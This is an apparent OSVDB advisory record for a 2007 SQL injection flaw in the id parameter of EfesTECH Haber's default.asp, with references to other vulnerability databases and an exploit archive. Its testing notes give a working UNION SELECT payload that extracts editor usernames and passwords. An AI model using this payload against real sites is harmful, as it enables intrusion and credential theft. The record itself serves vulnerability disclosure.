EfesTECH Haber default.asp id Variable SQL Injection

2007-05-14T06:48:56
ID OSVDB:36014
Type osvdb
Reporter OSVDB
Modified 2007-05-14T06:48:56

Description

Manual Testing Notes

/?efestech=haber&id=-1+union+select+0,kulladi,2,3,sifre,5,6,7,8,9,0,1,2,3,4+from+editorler

References:

Secunia Advisory ID:25247 ISS X-Force ID: 34272 Generic Exploit URL: http://www.milw0rm.com/exploits/3911 CVE-2007-2662 Bugtraq ID: 23960